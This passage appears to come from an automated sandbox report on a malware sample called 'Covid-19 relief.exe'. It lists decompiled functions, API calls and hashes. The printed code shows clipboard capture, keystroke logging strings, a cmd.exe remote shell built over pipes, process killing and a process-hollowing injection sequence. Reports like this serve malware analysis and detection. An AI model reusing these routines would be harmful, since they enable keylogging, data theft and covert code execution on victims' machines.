				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x41b889; // 0x0
				if(_t29 == 0) {
					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E00402B8A(_t9);
				}
				E004017DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                  0x0040d88e
                                  0x0040d896
                                  0x0040d89c
                                  0x0040d8a6
                                  0x0040d8b1
                                  0x0040d8b7
                                  0x0040e597
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                    • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                    • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                    • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                    • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                  • String ID:
                                  • API String ID: 187635395-0
                                  • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                  • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041358B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 384503197-0
                                  • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                  • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040309E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2505548081-0
                                  • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                  • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406BEF, Relevance: 6.0, APIs: 4, Instructions: 27clipboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 27%
                                  			E00406BEF(void* __ecx, intOrPtr _a4) {
				char _v5;
				void* _t15;

				if(OpenClipboard(0) == 0) {
					L3:
					_push( &_v5);
					_push(0x415664);
				} else {
					_t15 = GetClipboardData(1);
					CloseClipboard();
					if(_t15 == 0) {
						goto L3;
					} else {
						_push( &_v5);
						_push(_t15);
					}
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				return _a4;
			}





                                  0x00406bfe
                                  0x00406c1b
                                  0x00406c1e
                                  0x00406c1f
                                  0x00406c00
                                  0x00406c08
                                  0x00406c0a
                                  0x00406c12
                                  0x00000000
                                  0x00406c14
                                  0x00406c17
                                  0x00406c18
                                  0x00406c18
                                  0x00406c12
                                  0x00406c27
                                  0x00406c32

                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 00406BF6
                                  • GetClipboardData.USER32 ref: 00406C02
                                  • CloseClipboard.USER32(?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C0A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                  • String ID:
                                  • API String ID: 1727351239-0
                                  • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                  • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004054E9, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                  • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                  • String ID:
                                  • API String ID: 3911305588-0
                                  • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                  • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D7C0, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E0040D7C0(void* __eflags) {
				char* _t5;
				void* _t20;

				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004126BC(atoi(_t5));
				E004017DD(_t20 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d7c5
                                  0x0040d7cc
                                  0x0040d7da
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                  • atoi.MSVCRT ref: 0040D7D3
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                  • String ID:
                                  • API String ID: 1377568529-0
                                  • Opcode ID: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                  • Opcode Fuzzy Hash: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DCD4, Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040DCD4() {
				void* _t15;
				intOrPtr _t19;

				E0040AC8C();
				exit(0);
				while(1) {
					_t19 =  *0x41beb8; // 0x0
					if(_t19 == 0) {
						break;
					}
					Sleep(0x64);
				}
				E00408245();
				E004017DD(_t15 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040dcd4
                                  0x0040dcdb
                                  0x0040dce3
                                  0x0040dce3
                                  0x0040dce9
                                  0x00000000
                                  0x00000000
                                  0x0040dced
                                  0x0040dced
                                  0x0040dcf5
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • exit.MSVCRT ref: 0040DCDB
                                  • Sleep.KERNEL32(00000064), ref: 0040DCED
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                  • String ID:
                                  • API String ID: 772260455-0
                                  • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                  • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406B61, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [LCtrl] $ [RCtrl]
                                  • API String ID: 4257247948-618823999
                                  • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                  • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                  • String ID: open
                                  • API String ID: 317973523-2758837156
                                  • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                  • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: Covid-19 relief.exe PID: 1320 Parent PID: 5676 Covid-19 relief.exeCOMMON

                                  Executed Functions

                                  Function 05791C09, Relevance: 18.2, APIs: 12, Instructions: 225nativethreadprocessCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 05791CB7
                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05791CDC
                                  • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05791CF6
                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 05791D41
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05791D66
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05791DA9
                                  • NtTerminateProcess.NTDLL(?,00000000), ref: 05791DB7
                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 05791DC2
                                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 05791E36
                                  • NtGetContextThread.NTDLL(?,?), ref: 05791E50
                                  • NtSetContextThread.NTDLL(?,00010007), ref: 05791E74
                                  • NtResumeThread.NTDLL(?,00000000), ref: 05791E86
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.927908575.0000000005790000.00000040.00000001.sdmp, Offset: 05790000, based on PE: false
                                  Similarity
                                  • API ID: Section$ProcessThreadView$ContextCreateMemoryVirtual$InformationQueryReadResumeTerminateUnmapWrite
                                  • String ID:
                                  • API String ID: 3848664822-0
                                  • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction ID: 388cfd7b001b6650f725ed8c3100e8775b6d1c15a76bb464bd74b8b7a40b488b
                                  • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction Fuzzy Hash: 3791F371900249AFDF21DFA5DC88EEEBBB8FF89705F404059FA09EA150D731AA54DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 057900AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtOpenSection.NTDLL(?,0000000C,?), ref: 05790199
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 057901B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.927908575.0000000005790000.00000040.00000001.sdmp, Offset: 05790000, based on PE: false
                                  Similarity
                                  • API ID: Section$OpenView
                                  • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                  • API String ID: 2380476227-2634024955
                                  • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction ID: 8006a270f61c0e38e305396819bdc00c257966aefc2571295a45e6cb4dbc8cb8
                                  • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction Fuzzy Hash: 0B3137B1E10258EFCB14CFE4D889ADEBBB8FF08750F10415AE514EB250E7749A05CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00D79280, Relevance: 1.5, APIs: 1, Instructions: 242memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00D79508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922313384.0000000000D70000.00000040.00000001.sdmp, Offset: 00D70000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 332ddf7ed49765ccff5d7254cf314f8fca335abe8260918fecc7f8a6c6daecf1
                                  • Instruction ID: ab36a7ab55048714f47cec4f65f35aa11105d012562da60230739d22cca038b8
                                  • Opcode Fuzzy Hash: 332ddf7ed49765ccff5d7254cf314f8fca335abe8260918fecc7f8a6c6daecf1
                                  • Instruction Fuzzy Hash: 8B81F231A002049FCB10EBB4C864BAEFBE6EF89314F188569D559DB391EB35DC06C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00D794A0, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00D79508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922313384.0000000000D70000.00000040.00000001.sdmp, Offset: 00D70000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 0169543ee8e733c02d98d5fdb3224214d6afca3ca1ed62a0aca19fe0293018a3
                                  • Instruction ID: 10f02fde28f33b6d20a71bb26b6a3f8b394d86000cb030218c1e99ea7a650e77
                                  • Opcode Fuzzy Hash: 0169543ee8e733c02d98d5fdb3224214d6afca3ca1ed62a0aca19fe0293018a3
                                  • Instruction Fuzzy Hash: E111F8B59002499FCB10DF9AD844BDFFBF4EB48324F148429D529A7310D775A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B9D0EC, Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922219018.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a63e3f157eb1dc5732fea22d1bb0c5757bdb92588f07c5cb49382c962811949d
                                  • Instruction ID: 9b78ec17fdbfb2b591e86a807060acbcbff60aa120caa9367574d67e53b3ee24
                                  • Opcode Fuzzy Hash: a63e3f157eb1dc5732fea22d1bb0c5757bdb92588f07c5cb49382c962811949d
                                  • Instruction Fuzzy Hash: 172104B2544204EFDF00DF21D9C0B26BBA5FB84314F24C9B9D9095B346C376D846CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B9D0E7, Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922219018.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50b0195627c840c770fb90b7c415a8e6202c6b9d5b98d546d24497733f6893e3
                                  • Instruction ID: 870ccb50aff8f8f9f3f2174c52ec347b433ec2ef9da036e2c8eb88d919b5c245
                                  • Opcode Fuzzy Hash: 50b0195627c840c770fb90b7c415a8e6202c6b9d5b98d546d24497733f6893e3
                                  • Instruction Fuzzy Hash: D4119D76544280DFDB01CF20D9C4B15FBB1FB84324F28C6A9D8495B656C33AD84ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B8D041, Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
